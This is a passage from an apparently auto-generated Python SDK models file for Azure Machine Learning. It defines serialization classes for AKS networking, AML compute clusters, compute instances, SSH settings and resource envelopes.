:type service_cidr: str
:param dns_service_ip: An IP address assigned to the Kubernetes DNS service. It must be within
the Kubernetes service address range specified in serviceCidr.
:type dns_service_ip: str
:param docker_bridge_cidr: A CIDR notation IP range assigned to the Docker bridge network. It
must not overlap with any Subnet IP ranges or the Kubernetes service address range.
:type docker_bridge_cidr: str
"""
_validation = {
'service_cidr': {'pattern': r'^([0-9]{1,3}\.){3}[0-9]{1,3}(\/([0-9]|[1-2][0-9]|3[0-2]))?$'},
'dns_service_ip': {'pattern': r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'},
'docker_bridge_cidr': {'pattern': r'^([0-9]{1,3}\.){3}[0-9]{1,3}(\/([0-9]|[1-2][0-9]|3[0-2]))?$'},
}
_attribute_map = {
'subnet_id': {'key': 'subnetId', 'type': 'str'},
'service_cidr': {'key': 'serviceCidr', 'type': 'str'},
'dns_service_ip': {'key': 'dnsServiceIP', 'type': 'str'},
'docker_bridge_cidr': {'key': 'dockerBridgeCidr', 'type': 'str'},
}
def __init__(
self,
*,
subnet_id: Optional[str] = None,
service_cidr: Optional[str] = None,
dns_service_ip: Optional[str] = None,
docker_bridge_cidr: Optional[str] = None,
**kwargs
):
super(AksNetworkingConfiguration, self).__init__(**kwargs)
self.subnet_id = subnet_id
self.service_cidr = service_cidr
self.dns_service_ip = dns_service_ip
self.docker_bridge_cidr = docker_bridge_cidr
class AKSProperties(msrest.serialization.Model):
"""AKS properties.
Variables are only populated by the server, and will be ignored when sending a request.
:param cluster_fqdn: Cluster full qualified domain name.
:type cluster_fqdn: str
:ivar system_services: System services.
:vartype system_services: list[~azure.mgmt.machinelearningservices.models.SystemService]
:param agent_count: Number of agents.
:type agent_count: int
:param agent_vm_size: Agent virtual machine size.
:type agent_vm_size: str
:param ssl_configuration: SSL configuration.
:type ssl_configuration: ~azure.mgmt.machinelearningservices.models.SslConfiguration
:param aks_networking_configuration: AKS networking configuration for vnet.
:type aks_networking_configuration:
~azure.mgmt.machinelearningservices.models.AksNetworkingConfiguration
"""
_validation = {
'system_services': {'readonly': True},
'agent_count': {'minimum': 1},
}
_attribute_map = {
'cluster_fqdn': {'key': 'clusterFqdn', 'type': 'str'},
'system_services': {'key': 'systemServices', 'type': '[SystemService]'},
'agent_count': {'key': 'agentCount', 'type': 'int'},
'agent_vm_size': {'key': 'agentVMSize', 'type': 'str'},
'ssl_configuration': {'key': 'sslConfiguration', 'type': 'SslConfiguration'},
'aks_networking_configuration': {'key': 'aksNetworkingConfiguration', 'type': 'AksNetworkingConfiguration'},
}
def __init__(
self,
*,
cluster_fqdn: Optional[str] = None,
agent_count: Optional[int] = None,
agent_vm_size: Optional[str] = None,
ssl_configuration: Optional["SslConfiguration"] = None,
aks_networking_configuration: Optional["AksNetworkingConfiguration"] = None,
**kwargs
):
super(AKSProperties, self).__init__(**kwargs)
self.cluster_fqdn = cluster_fqdn
self.system_services = None
self.agent_count = agent_count
self.agent_vm_size = agent_vm_size
self.ssl_configuration = ssl_configuration
self.aks_networking_configuration = aks_networking_configuration
class AmlCompute(Compute):
"""An Azure Machine Learning compute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
:param properties: AML Compute properties.
:type properties: ~azure.mgmt.machinelearningservices.models.AmlComputeProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'AmlComputeProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["AmlComputeProperties"] = None,
**kwargs
):
super(AmlCompute, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'AmlCompute' # type: str
self.properties = properties
class AmlComputeNodeInformation(msrest.serialization.Model):
"""Compute node information related to a AmlCompute.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar node_id: ID of the compute node.
:vartype node_id: str
:ivar private_ip_address: Private IP address of the compute node.
:vartype private_ip_address: str
:ivar public_ip_address: Public IP address of the compute node.
:vartype public_ip_address: str
:ivar port: SSH port number of the node.
:vartype port: int
:ivar node_state: State of the compute node. Values are idle, running, preparing, unusable,
leaving and preempted. Possible values include: "idle", "running", "preparing", "unusable",
"leaving", "preempted".
:vartype node_state: str or ~azure.mgmt.machinelearningservices.models.NodeState
:ivar run_id: ID of the Experiment running on the node, if any else null.
:vartype run_id: str
"""
_validation = {
'node_id': {'readonly': True},
'private_ip_address': {'readonly': True},
'public_ip_address': {'readonly': True},
'port': {'readonly': True},
'node_state': {'readonly': True},
'run_id': {'readonly': True},
}
_attribute_map = {
'node_id': {'key': 'nodeId', 'type': 'str'},
'private_ip_address': {'key': 'privateIpAddress', 'type': 'str'},
'public_ip_address': {'key': 'publicIpAddress', 'type': 'str'},
'port': {'key': 'port', 'type': 'int'},
'node_state': {'key': 'nodeState', 'type': 'str'},
'run_id': {'key': 'runId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AmlComputeNodeInformation, self).__init__(**kwargs)
self.node_id = None
self.private_ip_address = None
self.public_ip_address = None
self.port = None
self.node_state = None
self.run_id = None
class ComputeNodesInformation(msrest.serialization.Model):
"""Compute nodes information related to a Machine Learning compute. Might differ for every type of compute.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AmlComputeNodesInformation.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:ivar next_link: The continuation token.
:vartype next_link: str
"""
_validation = {
'compute_type': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
_subtype_map = {
'compute_type': {'AmlCompute': 'AmlComputeNodesInformation'}
}
def __init__(
self,
**kwargs
):
super(ComputeNodesInformation, self).__init__(**kwargs)
self.compute_type = None # type: Optional[str]
self.next_link = None
class AmlComputeNodesInformation(ComputeNodesInformation):
"""Compute node information related to a AmlCompute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:ivar next_link: The continuation token.
:vartype next_link: str
:ivar nodes: The collection of returned AmlCompute nodes details.
:vartype nodes: list[~azure.mgmt.machinelearningservices.models.AmlComputeNodeInformation]
"""
_validation = {
'compute_type': {'required': True},
'next_link': {'readonly': True},
'nodes': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'next_link': {'key': 'nextLink', 'type': 'str'},
'nodes': {'key': 'nodes', 'type': '[AmlComputeNodeInformation]'},
}
def __init__(
self,
**kwargs
):
super(AmlComputeNodesInformation, self).__init__(**kwargs)
self.compute_type = 'AmlCompute' # type: str
self.nodes = None
class AmlComputeProperties(msrest.serialization.Model):
"""AML Compute properties.
Variables are only populated by the server, and will be ignored when sending a request.
:param vm_size: Virtual Machine Size.
:type vm_size: str
:param vm_priority: Virtual Machine priority. Possible values include: "Dedicated",
"LowPriority".
:type vm_priority: str or ~azure.mgmt.machinelearningservices.models.VmPriority
:param scale_settings: Scale settings for AML Compute.
:type scale_settings: ~azure.mgmt.machinelearningservices.models.ScaleSettings
:param user_account_credentials: Credentials for an administrator user account that will be
created on each compute node.
:type user_account_credentials:
~azure.mgmt.machinelearningservices.models.UserAccountCredentials
:param subnet: Virtual network subnet resource ID the compute nodes belong to.
:type subnet: ~azure.mgmt.machinelearningservices.models.ResourceId
:param remote_login_port_public_access: State of the public SSH port. Possible values are:
Disabled - Indicates that the public ssh port is closed on all nodes of the cluster. Enabled -
Indicates that the public ssh port is open on all nodes of the cluster. NotSpecified -
Indicates that the public ssh port is closed on all nodes of the cluster if VNet is defined,
else is open all public nodes. It can be default only during cluster creation time, after
creation it will be either enabled or disabled. Possible values include: "Enabled", "Disabled",
"NotSpecified". Default value: "NotSpecified".
:type remote_login_port_public_access: str or
~azure.mgmt.machinelearningservices.models.RemoteLoginPortPublicAccess
:ivar allocation_state: Allocation state of the compute. Possible values are: steady -
Indicates that the compute is not resizing. There are no changes to the number of compute nodes
in the compute in progress. A compute enters this state when it is created and when no
operations are being performed on the compute to change the number of compute nodes. resizing -
Indicates that the compute is resizing; that is, compute nodes are being added to or removed
from the compute. Possible values include: "Steady", "Resizing".
:vartype allocation_state: str or ~azure.mgmt.machinelearningservices.models.AllocationState
:ivar allocation_state_transition_time: The time at which the compute entered its current
allocation state.
:vartype allocation_state_transition_time: ~datetime.datetime
:ivar errors: Collection of errors encountered by various compute nodes during node setup.
:vartype errors: list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar current_node_count: The number of compute nodes currently assigned to the compute.
:vartype current_node_count: int
:ivar target_node_count: The target number of compute nodes for the compute. If the
allocationState is resizing, this property denotes the target node count for the ongoing resize
operation. If the allocationState is steady, this property denotes the target node count for
the previous resize operation.
:vartype target_node_count: int
:ivar node_state_counts: Counts of various node states on the compute.
:vartype node_state_counts: ~azure.mgmt.machinelearningservices.models.NodeStateCounts
"""
_validation = {
'allocation_state': {'readonly': True},
'allocation_state_transition_time': {'readonly': True},
'errors': {'readonly': True},
'current_node_count': {'readonly': True},
'target_node_count': {'readonly': True},
'node_state_counts': {'readonly': True},
}
_attribute_map = {
'vm_size': {'key': 'vmSize', 'type': 'str'},
'vm_priority': {'key': 'vmPriority', 'type': 'str'},
'scale_settings': {'key': 'scaleSettings', 'type': 'ScaleSettings'},
'user_account_credentials': {'key': 'userAccountCredentials', 'type': 'UserAccountCredentials'},
'subnet': {'key': 'subnet', 'type': 'ResourceId'},
'remote_login_port_public_access': {'key': 'remoteLoginPortPublicAccess', 'type': 'str'},
'allocation_state': {'key': 'allocationState', 'type': 'str'},
'allocation_state_transition_time': {'key': 'allocationStateTransitionTime', 'type': 'iso-8601'},
'errors': {'key': 'errors', 'type': '[MachineLearningServiceError]'},
'current_node_count': {'key': 'currentNodeCount', 'type': 'int'},
'target_node_count': {'key': 'targetNodeCount', 'type': 'int'},
'node_state_counts': {'key': 'nodeStateCounts', 'type': 'NodeStateCounts'},
}
def __init__(
self,
*,
vm_size: Optional[str] = None,
vm_priority: Optional[Union[str, "VmPriority"]] = None,
scale_settings: Optional["ScaleSettings"] = None,
user_account_credentials: Optional["UserAccountCredentials"] = None,
subnet: Optional["ResourceId"] = None,
remote_login_port_public_access: Optional[Union[str, "RemoteLoginPortPublicAccess"]] = "NotSpecified",
**kwargs
):
super(AmlComputeProperties, self).__init__(**kwargs)
self.vm_size = vm_size
self.vm_priority = vm_priority
self.scale_settings = scale_settings
self.user_account_credentials = user_account_credentials
self.subnet = subnet
self.remote_login_port_public_access = remote_login_port_public_access
self.allocation_state = None
self.allocation_state_transition_time = None
self.errors = None
self.current_node_count = None
self.target_node_count = None
self.node_state_counts = None
class AmlUserFeature(msrest.serialization.Model):
"""Features enabled for a workspace.
:param id: Specifies the feature ID.
:type id: str
:param display_name: Specifies the feature name.
:type display_name: str
:param description: Describes the feature for user experience.
:type description: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
display_name: Optional[str] = None,
description: Optional[str] = None,
**kwargs
):
super(AmlUserFeature, self).__init__(**kwargs)
self.id = id
self.display_name = display_name
self.description = description
class ClusterUpdateParameters(msrest.serialization.Model):
"""AmlCompute update parameters.
:param scale_settings: Desired scale settings for the amlCompute.
:type scale_settings: ~azure.mgmt.machinelearningservices.models.ScaleSettings
"""
_attribute_map = {
'scale_settings': {'key': 'properties.scaleSettings', 'type': 'ScaleSettings'},
}
def __init__(
self,
*,
scale_settings: Optional["ScaleSettings"] = None,
**kwargs
):
super(ClusterUpdateParameters, self).__init__(**kwargs)
self.scale_settings = scale_settings
class ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties(msrest.serialization.Model):
"""ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar principal_id: The principal id of user assigned identity.
:vartype principal_id: str
:ivar client_id: The client id of user assigned identity.
:vartype client_id: str
"""
_validation = {
'principal_id': {'readonly': True},
'client_id': {'readonly': True},
}
_attribute_map = {
'principal_id': {'key': 'principalId', 'type': 'str'},
'client_id': {'key': 'clientId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties, self).__init__(**kwargs)
self.principal_id = None
self.client_id = None
class ComputeInstance(Compute):
"""An Azure Machine Learning compute instance.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
:param properties: Compute Instance properties.
:type properties: ~azure.mgmt.machinelearningservices.models.ComputeInstanceProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'ComputeInstanceProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["ComputeInstanceProperties"] = None,
**kwargs
):
super(ComputeInstance, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'ComputeInstance' # type: str
self.properties = properties
class ComputeInstanceApplication(msrest.serialization.Model):
"""Defines an Aml Instance application and its connectivity endpoint URI.
:param display_name: Name of the ComputeInstance application.
:type display_name: str
:param endpoint_uri: Application' endpoint URI.
:type endpoint_uri: str
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'endpoint_uri': {'key': 'endpointUri', 'type': 'str'},
}
def __init__(
self,
*,
display_name: Optional[str] = None,
endpoint_uri: Optional[str] = None,
**kwargs
):
super(ComputeInstanceApplication, self).__init__(**kwargs)
self.display_name = display_name
self.endpoint_uri = endpoint_uri
class ComputeInstanceConnectivityEndpoints(msrest.serialization.Model):
"""Defines all connectivity endpoints and properties for a ComputeInstance.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar public_ip_address: Public IP Address of this ComputeInstance.
:vartype public_ip_address: str
:ivar private_ip_address: Private IP Address of this ComputeInstance (local to the VNET in
which the compute instance is deployed).
:vartype private_ip_address: str
"""
_validation = {
'public_ip_address': {'readonly': True},
'private_ip_address': {'readonly': True},
}
_attribute_map = {
'public_ip_address': {'key': 'publicIpAddress', 'type': 'str'},
'private_ip_address': {'key': 'privateIpAddress', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ComputeInstanceConnectivityEndpoints, self).__init__(**kwargs)
self.public_ip_address = None
self.private_ip_address = None
class ComputeInstanceCreatedBy(msrest.serialization.Model):
"""Describes information on user who created this ComputeInstance.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar user_name: Name of the user.
:vartype user_name: str
:ivar user_org_id: Uniquely identifies user' Azure Active Directory organization.
:vartype user_org_id: str
:ivar user_id: Uniquely identifies the user within his/her organization.
:vartype user_id: str
"""
_validation = {
'user_name': {'readonly': True},
'user_org_id': {'readonly': True},
'user_id': {'readonly': True},
}
_attribute_map = {
'user_name': {'key': 'userName', 'type': 'str'},
'user_org_id': {'key': 'userOrgId', 'type': 'str'},
'user_id': {'key': 'userId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ComputeInstanceCreatedBy, self).__init__(**kwargs)
self.user_name = None
self.user_org_id = None
self.user_id = None
class ComputeInstanceLastOperation(msrest.serialization.Model):
"""The last operation on ComputeInstance.
:param operation_name: Name of the last operation. Possible values include: "Create", "Start",
"Stop", "Restart", "Reimage", "Delete".
:type operation_name: str or ~azure.mgmt.machinelearningservices.models.OperationName
:param operation_time: Time of the last operation.
:type operation_time: ~datetime.datetime
:param operation_status: Operation status. Possible values include: "InProgress", "Succeeded",
"CreateFailed", "StartFailed", "StopFailed", "RestartFailed", "ReimageFailed", "DeleteFailed".
:type operation_status: str or ~azure.mgmt.machinelearningservices.models.OperationStatus
"""
_attribute_map = {
'operation_name': {'key': 'operationName', 'type': 'str'},
'operation_time': {'key': 'operationTime', 'type': 'iso-8601'},
'operation_status': {'key': 'operationStatus', 'type': 'str'},
}
def __init__(
self,
*,
operation_name: Optional[Union[str, "OperationName"]] = None,
operation_time: Optional[datetime.datetime] = None,
operation_status: Optional[Union[str, "OperationStatus"]] = None,
**kwargs
):
super(ComputeInstanceLastOperation, self).__init__(**kwargs)
self.operation_name = operation_name
self.operation_time = operation_time
self.operation_status = operation_status
class ComputeInstanceProperties(msrest.serialization.Model):
"""Compute Instance properties.
Variables are only populated by the server, and will be ignored when sending a request.
:param vm_size: Virtual Machine Size.
:type vm_size: str
:param subnet: Virtual network subnet resource ID the compute nodes belong to.
:type subnet: ~azure.mgmt.machinelearningservices.models.ResourceId
:param application_sharing_policy: Policy for sharing applications on this compute instance
among users of parent workspace. If Personal, only the creator can access applications on this
compute instance. When Shared, any workspace user can access applications on this instance
depending on his/her assigned role. Possible values include: "Personal", "Shared". Default
value: "Shared".
:type application_sharing_policy: str or
~azure.mgmt.machinelearningservices.models.ApplicationSharingPolicy
:param ssh_settings: Specifies policy and settings for SSH access.
:type ssh_settings: ~azure.mgmt.machinelearningservices.models.ComputeInstanceSshSettings
:ivar connectivity_endpoints: Describes all connectivity endpoints available for this
ComputeInstance.
:vartype connectivity_endpoints:
~azure.mgmt.machinelearningservices.models.ComputeInstanceConnectivityEndpoints
:ivar applications: Describes available applications and their endpoints on this
ComputeInstance.
:vartype applications:
list[~azure.mgmt.machinelearningservices.models.ComputeInstanceApplication]
:ivar created_by: Describes information on user who created this ComputeInstance.
:vartype created_by: ~azure.mgmt.machinelearningservices.models.ComputeInstanceCreatedBy
:ivar errors: Collection of errors encountered on this ComputeInstance.
:vartype errors: list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar state: The current state of this ComputeInstance. Possible values include: "Creating",
"CreateFailed", "Deleting", "Running", "Restarting", "JobRunning", "SettingUp", "SetupFailed",
"Starting", "Stopped", "Stopping", "UserSettingUp", "UserSetupFailed", "Unknown", "Unusable".
:vartype state: str or ~azure.mgmt.machinelearningservices.models.ComputeInstanceState
:ivar last_operation: The last operation on ComputeInstance.
:vartype last_operation:
~azure.mgmt.machinelearningservices.models.ComputeInstanceLastOperation
"""
_validation = {
'connectivity_endpoints': {'readonly': True},
'applications': {'readonly': True},
'created_by': {'readonly': True},
'errors': {'readonly': True},
'state': {'readonly': True},
'last_operation': {'readonly': True},
}
_attribute_map = {
'vm_size': {'key': 'vmSize', 'type': 'str'},
'subnet': {'key': 'subnet', 'type': 'ResourceId'},
'application_sharing_policy': {'key': 'applicationSharingPolicy', 'type': 'str'},
'ssh_settings': {'key': 'sshSettings', 'type': 'ComputeInstanceSshSettings'},
'connectivity_endpoints': {'key': 'connectivityEndpoints', 'type': 'ComputeInstanceConnectivityEndpoints'},
'applications': {'key': 'applications', 'type': '[ComputeInstanceApplication]'},
'created_by': {'key': 'createdBy', 'type': 'ComputeInstanceCreatedBy'},
'errors': {'key': 'errors', 'type': '[MachineLearningServiceError]'},
'state': {'key': 'state', 'type': 'str'},
'last_operation': {'key': 'lastOperation', 'type': 'ComputeInstanceLastOperation'},
}
def __init__(
self,
*,
vm_size: Optional[str] = None,
subnet: Optional["ResourceId"] = None,
application_sharing_policy: Optional[Union[str, "ApplicationSharingPolicy"]] = "Shared",
ssh_settings: Optional["ComputeInstanceSshSettings"] = None,
**kwargs
):
super(ComputeInstanceProperties, self).__init__(**kwargs)
self.vm_size = vm_size
self.subnet = subnet
self.application_sharing_policy = application_sharing_policy
self.ssh_settings = ssh_settings
self.connectivity_endpoints = None
self.applications = None
self.created_by = None
self.errors = None
self.state = None
self.last_operation = None
class ComputeInstanceSshSettings(msrest.serialization.Model):
"""Specifies policy and settings for SSH access.
Variables are only populated by the server, and will be ignored when sending a request.
:param ssh_public_access: State of the public SSH port. Possible values are: Disabled -
Indicates that the public ssh port is closed on this instance. Enabled - Indicates that the
public ssh port is open and accessible according to the VNet/subnet policy if applicable.
Possible values include: "Enabled", "Disabled". Default value: "Disabled".
:type ssh_public_access: str or ~azure.mgmt.machinelearningservices.models.SshPublicAccess
:ivar admin_user_name: Describes the admin user name.
:vartype admin_user_name: str
:ivar ssh_port: Describes the port for connecting through SSH.
:vartype ssh_port: int
:param admin_public_key: Specifies the SSH rsa public key file as a string. Use "ssh-keygen -t
rsa -b 2048" to generate your SSH key pairs.
:type admin_public_key: str
"""
_validation = {
'admin_user_name': {'readonly': True},
'ssh_port': {'readonly': True},
}
_attribute_map = {
'ssh_public_access': {'key': 'sshPublicAccess', 'type': 'str'},
'admin_user_name': {'key': 'adminUserName', 'type': 'str'},
'ssh_port': {'key': 'sshPort', 'type': 'int'},
'admin_public_key': {'key': 'adminPublicKey', 'type': 'str'},
}
def __init__(
self,
*,
ssh_public_access: Optional[Union[str, "SshPublicAccess"]] = "Disabled",
admin_public_key: Optional[str] = None,
**kwargs
):
super(ComputeInstanceSshSettings, self).__init__(**kwargs)
self.ssh_public_access = ssh_public_access
self.admin_user_name = None
self.ssh_port = None
self.admin_public_key = admin_public_key
class Resource(msrest.serialization.Model):
"""Azure Resource Manager resource envelope.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar name: Specifies the name of the resource.
:vartype name: str
:param identity: The identity of the resource.
:type identity: ~azure.mgmt.machinelearningservices.models.Identity
:param location: Specifies the location of the resource.
:type location: str
:ivar type: Specifies the type of the resource.
:vartype type: str
:param tags: A set of tags. Contains resource tags defined as key/value pairs.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
}
def __init__(
self,
*,
identity: Optional["Identity"] = None,
location: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
**kwargs
):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.identity = identity
self.location = location
self.type = None
self.tags = tags
self.sku = sku
class ComputeResource(Resource):
"""Machine Learning compute object wrapped into ARM resource envelope.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar name: Specifies the name of the resource.
:vartype name: str
:param identity: The identity of the resource.
:type identity: ~azure.mgmt.machinelearningservices.models.Identity
:param location: Specifies the location of the resource.
:type location: str
:ivar type: Specifies the type of the resource.
:vartype type: str
:param tags: A set of tags. Contains resource tags defined as key/value pairs.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
:param properties: Compute properties.
:type properties: ~azure.mgmt.machinelearningservices.models.Compute
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
'properties': {'key': 'properties', 'type': 'Compute'},
}
def __init__(
self,
*,
identity: Optional["Identity"] = None,
location: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
properties: Optional["Compute"] = None,
**kwargs
):
super(ComputeResource, self).__init__(identity=identity, location=location, tags=tags, sku=sku, **kwargs)
self.properties = properties
class Databricks(Compute):
"""A DataFactory compute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
:param properties:
:type properties: ~azure.mgmt.machinelearningservices.models.DatabricksProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
